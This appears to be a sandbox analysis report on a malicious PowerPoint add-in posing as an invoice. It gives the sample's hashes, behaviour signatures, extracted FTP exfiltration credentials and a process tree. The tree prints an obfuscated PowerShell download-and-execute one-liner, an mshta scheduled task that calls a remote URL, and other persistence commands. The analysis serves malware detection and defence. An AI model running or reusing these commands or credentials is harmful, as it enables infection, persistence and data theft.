Analysis
-
max time kernel
83s -
max time network
146s -
platform
windows10-2004_x64 -
resource
win10v2004-20220812-en -
resource tags
-
submitted
27-09-2022 06:22
General
-
Target
invoice_6_812937_pdf.ppam
-
Size
43KB
-
MD5
63aa8d7cc49200536403df68983a8de1
-
SHA1
eb7caabc3fb8d4ca3548765f6fc59a03435b6aff
-
SHA256
f7353ec4f751d69464d3b51344e2283e8a5607eb5c2b66cbb5a6b0102a58f697
-
SHA512
6c2c6415a9c2ae4a03ccc2ceaf0a4186b46a366c215ade1f2d40ae74146de16f39833cbf5292877f452cfd8814051e1b61586e73e28bac28f35adee0d9c53074
-
SSDEEP
768:MAzJ/c/lsTsK/n/Okf6R9/i/LxC8vVJOQPdYI+4zrSNJAWWnxmT0gXJ17CfDjraG:MAFkt09fmj7ajB0mxIPgHragw1/K8Nyh
Malware Config
Extracted
Protocol: ftp- Host:
107.182.129.168 - Port:
21 - Username:
ffhvfv6 - Password:
asasasals
Signatures
-
Process spawned unexpected child process 1 IoCs
This typically indicates the parent process was compromised via an exploit or macro.
-
Blocklisted process makes network request 2 IoCs
-
Drops file in Drivers directory 1 IoCs
-
Checks computer location settings 2 TTPs 3 IoCs
Looks up country code configured in the registry, likely geofence.
-
Drops startup file 3 IoCs
-
Accesses Microsoft Outlook profiles 1 TTPs 3 IoCs
-
Suspicious use of SetThreadContext 3 IoCs
-
Drops file in Windows directory 1 IoCs
-
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.
-
Checks processor information in registry 2 TTPs 9 IoCs
Processor information is often read in order to detect sandboxing environments.
-
Creates scheduled task(s) 1 TTPs 3 IoCs
Schtasks is often used by malware for persistence or to perform post-infection execution.
-
Enumerates system info in registry 2 TTPs 7 IoCs
-
Modifies registry class 1 IoCs
-
Runs ping.exe 1 TTPs 1 IoCs
-
Suspicious behavior: AddClipboardFormatListener 1 IoCs
-
Suspicious behavior: EnumeratesProcesses 12 IoCs
-
Suspicious use of AdjustPrivilegeToken 10 IoCs
-
Suspicious use of SetWindowsHookEx 4 IoCs
-
Suspicious use of WriteProcessMemory 58 IoCs
-
outlook_office_path 1 IoCs
-
outlook_win_path 1 IoCs
Processes
-
C:\Program Files\Microsoft Office\Root\Office16\POWERPNT.EXE"C:\Program Files\Microsoft Office\Root\Office16\POWERPNT.EXE" "C:\Users\Admin\AppData\Local\Temp\invoice_6_812937_pdf.ppam" /ou ""1⤵
- Drops startup file
- Checks processor information in registry
- Enumerates system info in registry
- Suspicious behavior: AddClipboardFormatListener
- Suspicious use of SetWindowsHookEx
- Suspicious use of WriteProcessMemory
-
C:\Windows\SYSTEM32\wscript.exewscript.exe //b //e:jscript C:\\Users\\Public\\sys.ini2⤵
- Process spawned unexpected child process
- Checks computer location settings
- Suspicious use of WriteProcessMemory
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -NoP -EP B -C (I'w'r('https://www.mediafire.com/file/0168mlb8ydtjtwx/6.txt/file') -useB) | .('{#}{_}'.replace('_','0').replace('#','1')-f'^#','>').replace('>','I').replace('^','E').replace('#','X') | ping 127.0.0.13⤵
- Blocklisted process makes network request
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
-
C:\Windows\System32\WScript.exe"C:\Windows\System32\WScript.exe" "C:\ProgramData\holatyrimakachola\helloitsindian.vbs"4⤵
- Checks computer location settings
- Drops startup file
- Modifies registry class
- Suspicious use of WriteProcessMemory
-
C:\Windows\System32\WScript.exe"C:\Windows\System32\WScript.exe" "C:\ProgramData\holatyrimakachola\JIGIJIGI.vbs"5⤵
- Checks computer location settings
- Suspicious use of WriteProcessMemory
-
C:\Windows\System32\schtasks.exe"C:\Windows\System32\schtasks.exe" /create /sc MINUTE /mo 120 /tn Appligation /F /tr "C:\ProgramData\holatyrimakachola\helloitsindian.vbs"6⤵
- Creates scheduled task(s)
-
-
C:\Windows\System32\schtasks.exe"C:\Windows\System32\schtasks.exe" /create /sc MINUTE /mo 45 /tn ChromiumPluginupdate /F /tr "C:\ProgramData\holatyrimakachola\ChromeExtentionUpdate.vbs"6⤵
- Creates scheduled task(s)
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c ""C:\ProgramData\holatyrimakachola\JIGIJIGI.bat" "5⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exePowerShell.exe -NoProfile -ExecutionPolicy Bypass -Command C:\ProgramData\holatyrimakachola\GOLGAPORA.PS16⤵
- Suspicious use of SetThreadContext
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
-
C:\Windows\Microsoft.NET\Framework\v4.0.30319\jsc.exe"C:\Windows\Microsoft.NET\Framework\v4.0.30319\jsc.exe"7⤵
- Drops file in Drivers directory
- Accesses Microsoft Outlook profiles
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of SetWindowsHookEx
- outlook_office_path
- outlook_win_path
-
-
C:\Windows\Microsoft.NET\Framework\v2.0.50727\caspol.exe"C:\Windows\Microsoft.NET\Framework\v2.0.50727\caspol.exe"7⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\Microsoft.NET\Framework\v2.0.50727\dw20.exedw20.exe -x -s 7848⤵
- Drops file in Windows directory
- Checks processor information in registry
- Enumerates system info in registry
- Suspicious use of AdjustPrivilegeToken
-
-
-
C:\Windows\Microsoft.NET\Framework\v3.5\Msbuild.exe"C:\Windows\Microsoft.NET\Framework\v3.5\Msbuild.exe"7⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\Microsoft.NET\Framework\v2.0.50727\dw20.exedw20.exe -x -s 7688⤵
- Checks processor information in registry
- Enumerates system info in registry
- Suspicious use of AdjustPrivilegeToken
-
-
-
C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe"C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\Admin\AppData\Local\Temp\v0340o42\v0340o42.cmdline"7⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exeC:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RESA2D7.tmp" "c:\Users\Admin\AppData\Local\Temp\v0340o42\CSC26C31378D5CE42758DAA4FB6D3FDB.TMP"8⤵
-
-
-
C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe"C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\Admin\AppData\Local\Temp\2xqoy0j3\2xqoy0j3.cmdline"7⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exeC:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RESBF58.tmp" "c:\Users\Admin\AppData\Local\Temp\2xqoy0j3\CSCFD25DF61181741E8B4DFF8DED76E10F8.TMP"8⤵
-
-
-
-
-
-
C:\Windows\system32\PING.EXE"C:\Windows\system32\PING.EXE" 127.0.0.14⤵
- Runs ping.exe
-
-
-
C:\Windows\System32\schtasks.exe"C:\Windows\System32\schtasks.exe" /create /sc MINUTE /mo 100 /tn MicrosoftUpdater /F /tr """Mshta""""""http://www.6fgjfkgjfk.blogspot.com/atom.xml"""3⤵
- Creates scheduled task(s)
-
-
Network
MITRE ATT&CK Enterprise v6
Replay Monitor
Loading Replay Monitor...
Downloads
-
Filesize
1.1MB
MD5a85604b14ae891a173564321c379d2d6
SHA18f40e70cc066307bc3f4e41e2ac2d905c0d8e627
SHA2566204b02c519235e891002db408bb11bdfc90a4362e4b7e44aeaa09ed0a199f73
SHA51236273a2f8cc1b4a9efe05d67d3a8584d29537d7c58dd8ee38e6d240f8c55f161d0a042409d52b004edb3e834c8f7c6027a3723104ce9bffc3bc63d8112f5e964
-
Filesize
105B
MD57f53280ea46314479ed1d63b7d9625eb
SHA19a045c31da18e934b1ca4ce27b72daf0cbbd87fe
SHA25688bc996293478f62bb28814b1787c278a6dc0ed20fe8b11e3f644985b6514459
SHA512275868f4214bc8b874ec857f8938fc35fb77ef025596e1e0cdbea2d231864bec8c4ae09fb557c8dcbe95131c10962cc11744b210f1ec0c111db663fa27a7dbf3
-
Filesize
562B
MD58ea0ee4f4d6ccbabe4117cdd6f974011
SHA13271a608993c307046b3185c9a21d434d39fb19c
SHA256cfed6df2d13d6a842032d23d0b12429ca0ddb4ef2bba89f096a05ba44516c620
SHA5125b10ff90b6560956670c85f33266384f4ed401845e137e356ff15e4d613a6a6cc6ff42e68ccde85e0c49d58b7c20f25132ece60a2b60977dd1b3066e59cca61e
-
Filesize
387B
MD5f0ca1358f7cbc07ffadcdcbb09a8096e
SHA1a1839290fb16f5ccfbcbeec71bcfa4afaa842eaa
SHA256b964c3f6be44ac474f116783e4ca950b909109ff7ea1cf9db9a879a29beeae43
SHA51260fe0ab41793a5fd89a5ffad088a46b0cc8c4db06b8180446e1a4d036c7f81faf35fa726bc9f7b4231b99946ac3c99ae659b4e5a7611e10da2d86344fa620d2c
-
Filesize
3KB
MD5556084f2c6d459c116a69d6fedcc4105
SHA1633e89b9a1e77942d822d14de6708430a3944dbc
SHA25688cc4f40f0eb08ff5c487d6db341b046cc63b22534980aca66a9f8480692f3a8
SHA5120f6557027b098e45556af93e0be1db9a49c6416dc4afcff2cc2135a8a1ad4f1cf7185541ddbe6c768aefaf2c1a8e52d5282a538d15822d19932f22316edd283e
-
Filesize
436B
MD5f623349d8d54ce562bc94277bf8fd87e
SHA1fe58a81115de67a05a54b1b92b42f3d27d021363
SHA2562e7992a3c3ecc9ef98804c75a0d06f5ee0f1cb63d9271cead96c1a0a3e053815
SHA5127f7a35f1aa6c813fc54f6a1f1a51f1c7cfb0cb076e3212444b9efefb1bafeae5db1311c13a8ee8ec396bbd4de760260bdc516e0cbc90b83481745f6ae1124a6b
-
Filesize
3KB
MD5675a35effadd15c993c9b54c7902d167
SHA195a3037f996524c7fb38b1a50490694fa46d7429
SHA256dca56783611675b66f54eceb2e85c09ec73fd20c815f89f13fa4fef7acd2e01c
SHA512c4e0fb977c8900ad11ea5cc8c7976d5059cfc29e80f331ed3d402d5688f107b7cc37be6343da8c82d37841fdab18d4ed3afe6b9f614462c297a3a12cbc1c26e0
-
Filesize
1KB
MD53d264449f076b5d3d9ada87b6e3903cb
SHA148a5da325f763b0978ec66b65bd0a92a9b296b70
SHA256b50cbed1980e7d933b0d79c7b37a753b4f549d1c0995fecf46aafa9eb2c8e71d
SHA51245844f57dc2f1d365899a53c6ab6d6866a6033043581d90e0cad7d7a5f1b804d2a984cf35b950ef28d02f839bd4f05478259820eaaf08cdc2d0336b9ad5b2d09
-
Filesize
1KB
MD5287d854499710e601762adeb41bd1118
SHA182357906e598c012d3b0cd100dc80196c8c17cf7
SHA256bdb6283ea8811355e4d7fe986c00d444e8121916ab6180193fb9694ab300c900
SHA512cf8e338e7edeb904b78859092bb95aa33d493c9f60f7319ebd644fb94388680f96c8b737c1520ffa43a4a1b2d8362a83e57eea7ec292d81ff93a0eaf97b8ac0d
-
Filesize
3KB
MD5892dedb205d7b55a6b0b40d6adf32264
SHA18c47e352e94d18f63ae33abf8ffba0924c410393
SHA256032c0ac88d5327d4199eb28b29113725f6271f6abbb9cf8efa9c86a70fc8b618
SHA512926fabddaec80fe051cafb47e46852a7c165200fe37b59cfafd0ee0f6e7c2b670854da2bef62c1f8ed9594e37245223ee8054cc97cca30538f3c95703ad16512
-
Filesize
2KB
MD56fc75a2d459b7fcb7fd66e462a56c60f
SHA10518dc637f9ece1726edea7fb614c2c5518c3cad
SHA256623d3cdf7b82bb7b3e7d3143b02f0e5046505a0f4f87fe20ded1280eb9d0ab99
SHA512e110063ad8aa3fbcae9e4af4473ddf1a2deaa15d0c8f8258eec9b1af7e6fe62181765ffc979f9cddd310740cd6eac2cf8975da95755ac0aacb24eb2f92706382
-
Filesize
424B
MD55b0a710c68952a280e3737f249a789bb
SHA1cfd4349b3ebe8232b342fa6667e63d8027fcd26b
SHA25632781e50bffd54bf50e075fc3c5fea9bf02030c8aeb34344cf15592d702973ad
SHA51237efadb9ecade74d0f57bf0c5f5ff254203f952a7b54443433dadbc1e720d294ac6e3694a016520b99747a9856dc523d8a901f209285dba53863dd2e3e64e8ad
-
Filesize
369B
MD54886f9d895c61f54c58a00890ff0399b
SHA17d57c027631589b5a891aedbc9bd6aa51665aebc
SHA256f684e2f1e5fae564cc02ce101c11e67c0382f820e73829d057287a9e4db8b734
SHA512712438792dad774c2067a28f03c1dde9c8e199c8beac6d22e06ca70bc250c10f8a3ce980ae65da57b4718c1bbfc7c9ed94726ea8f4f690f62a9a1070c529a812
-
Filesize
652B
MD5b439d9b048de93e300e78b1c1109e2e5
SHA174bab01293918a25c7f691c6def0cb875dd7a060
SHA25685360fb32fffe8e99e03e6f61781432661a37e01a57aa7a504e72155c7e3fa13
SHA512ad8acc38be2524fdb00f280f7ae97ca399ea8096367a9c53d4a28ce730c33255451be5c8e2ea03c717227428d69625dedf4aa0a0ec4aa046e371dca733ed867e
-
Filesize
652B
MD50009773f647a897226aadad912c696c0
SHA194c018c893a31d2f93be2e9a6584f7235dc3d2cc
SHA2568bba67650f51581fb633bb4d60a4ba43a28f26c344da7f45f1564ba75cc29ea5
SHA5124ee2e52b48a303064679ac6241d4d9516ff678059d2ba346850f736ef8645e25bc8b82e27a34690ac511d8f385dddfddb1aed41d33b19de75780c88cb760ddb1
-
Filesize
424B
MD5d05db7ca65c16470a87f4c4007e9e026
SHA1ab4a5e6b4fbc331c345d88c39239f003f8dd3da7
SHA256c1412a0d2269b59df9d6b003b2f82f9479040dae4c4e12629db5845a6ac4c960
SHA512825d664f3df2ad4ef8b1e501e6a99aaae7d54db59b9308c34ad3d64b07a6792412beded53919ea8bf9e137f4a7e8aa7ac388a036ab256a1cce201a208ef311cb
-
Filesize
369B
MD545124ef96315fa0cfe0dc0f53ef5d718
SHA1c65113ec5b4546a638de5f84158b191565eade12
SHA256e4b933cc33a2bcec456708a61388902fccc926925714b02ae4c16fb58a7dbaea
SHA512e640c674f3e3c87823e61ce0adbaf55cb2f77920556472cca2dbb0ff1190f171035f818db623ce8ee46973b0406b39d7012443e68986e469333fbc229915e433
-
Filesize
5.7MB
-
Filesize
5.7MB
-
Filesize
64KB
-
Filesize
64KB
-
Filesize
64KB
-
Filesize
64KB
-
Filesize
64KB
-
Filesize
64KB
-
Filesize
64KB
-
Filesize
64KB
-
Filesize
64KB
-
Filesize
64KB
-
Filesize
64KB
-
Filesize
10.8MB
-
Filesize
10.8MB
-
Filesize
10.8MB
-
Filesize
5.7MB
-
Filesize
5.7MB
-
Filesize
136KB
-
Filesize
10.8MB
-
Filesize
10.8MB
-
Filesize
584KB
-
Filesize
408KB
-
Filesize
624KB
-
Filesize
5.6MB
-
Filesize
40KB
-
Filesize
520KB
-
Filesize
320KB